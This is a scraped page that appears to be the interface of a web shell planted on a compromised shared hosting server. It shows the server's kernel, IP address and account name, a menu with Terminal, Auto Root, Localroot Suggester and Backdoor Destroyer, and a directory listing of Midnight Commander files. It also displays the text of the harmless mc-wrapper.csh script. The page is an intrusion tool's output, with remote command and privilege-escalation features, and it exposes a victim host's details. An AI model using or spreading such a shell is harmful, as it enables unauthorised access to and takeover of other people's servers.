Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.16.81.94
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
libexec /
mc /
Delete
Unzip
Name
Size
Permission
Date
Action
ext.d
[ DIR ]
drwxr-xr-x
2024-03-21 15:41
extfs.d
[ DIR ]
drwxr-xr-x
2024-03-21 15:41
fish
[ DIR ]
drwxr-xr-x
2024-03-21 15:41
cons.saver
13.05
KB
-rwxr-xr-x
2019-10-18 20:38
mc-wrapper.csh
410
B
-rw-r--r--
2019-10-18 20:38
mc-wrapper.sh
333
B
-rw-r--r--
2019-10-18 20:38
mc.csh
49
B
-rw-r--r--
2019-10-18 20:38
mc.sh
153
B
-rw-r--r--
2019-10-18 20:38
Save
Rename
set MC_USER="`id | sed 's/[^(]*(//;s/).*//'`" if ($?TMPDIR) then setenv MC_PWD_FILE $TMPDIR/mc-$MC_USER/mc.pwd.$$ else setenv MC_PWD_FILE /var/tmp/mc-$MC_USER/mc.pwd.$$ endif /usr/bin/mc -P "$MC_PWD_FILE" $* if (-r "$MC_PWD_FILE") then setenv MC_PWD "`cat '$MC_PWD_FILE'`" if ( -d "$MC_PWD" ) then cd "$MC_PWD" endif unsetenv MC_PWD endif rm -f "$MC_PWD_FILE" unsetenv MC_PWD_FILE unsetenv MC_USER